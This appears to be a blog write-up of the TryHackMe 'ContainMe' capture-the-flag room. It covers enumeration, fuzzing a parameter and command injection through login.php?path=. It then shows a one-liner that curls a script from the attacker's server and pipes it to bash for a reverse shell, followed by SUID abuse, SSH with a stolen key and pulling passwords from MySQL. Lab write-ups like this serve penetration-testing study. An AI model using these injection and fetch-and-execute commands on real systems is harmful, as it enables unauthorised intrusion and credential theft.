ContainMe Walkthrough En | TryHackMe – Write-up

Where am I ? Catch me

 

ContainMe is a CTF from TryHackMe, whose initial approach is very interesting with a command injection to find. The reverse engineering part is quite blocking. Once past the escalation of privilege is very simple.

  • Français
  • English

Buy Me a Coffee

Enumeration

Command :

nmap -T5  10.10.235.114

4 open ports including at least 2 ssh services (port 22 and 8022) and an unknown service on port 2222.

Web enumeration

dirsearch -u 10.10.235.114 -x 403

Dirsearch finds several web pages, including /index.php/login. This page shows us the contents of a folder, probably /var/www/html. The source display gives us this indication:

<! – where is the path? ->

 

Fuzzing path

The clue indicates that you have to find the right path to make a lfi/rce. We will use  wfuzz.

Command :

wfuzz -u http://10.10.235.114/index.php?FUZZ=id -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt –filter ‘h!=329’

The path is: path

 

Initial FootHold

With BurpSuite, it is possible to do several tests to fully understand how login.php?path= works. As there is already a ls command which is done naturally, it is necessary to put; to place an additional order.

Reverse Shell

Still with BurpSuite, we will recover a bash file shared with kali then have it executed by bash via a pipe |

Command :

;curl+http://10.11.38.124:8585/test.sh | bash

We must remember to encode ( crtl + u ) the command so that the server can understand what has asked.

So that curl can retrieve the test.sh file, you have to set up a web server with python and the following command:

python3.9 -m http.server 8585

Contents of the test.sh file :

Enumération locale - search for SUID

Command :

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

The binary crypt has SUID root rights, and it can be run by anyone. If we time to run it with a command in addition to example ./crypt id, it gives us an error message : 

Unable to decompress.

Lateral movement on Mike's account ?

Command :

./crypt mike

We switched to a root account which must be in a container. We will list with linpeas.

Command to download it :

wget http://10.11.38.124:8585/linpeas2.sh

In mike’s account, there is a private key id_rsa that we will try to use. It remains to be seen on which ssh server this key is valid?

The system has three Ethernet interfaces (192.168.250.10, 172.16.20.2, 127.0.0.1). The key does not work on any of its IP addresses.

With the following command line, a new IP address will appear. On which we will be able to connect in ssh.

for ip in $(seq 1 255  );do ping -c 1 172.16.20.$ip;done

SSH login to Mike's account

Command :

ssh mike@172.16.20.6 -i id_rsa

It is not possible to reach the TryHackMe network due to a probable absence of routing between the different Ethernet card and container. You have to enumerate manually.

Escalade de privilège.

There is a sql server listening on the local loop.

Command :

netstat -tulpn

Connection to sql server

Command :

mysql -u mike -p

The connection requires a password that must be guessed 

List of commands to extract the identifiers of user accounts:

show databases;

use accounts

show tables ;

select * from users ;

 

We get the password for the root account. All you have to do is connect to it and retrieve the flag.

#

That’s all folks

Thank you for taking the trouble to come to the site to read this Write Up

Hope he got you more and taught you new things.

Please feel free to leave a comment or share this article.

Facebook
Twitter
LinkedIn
Pinterest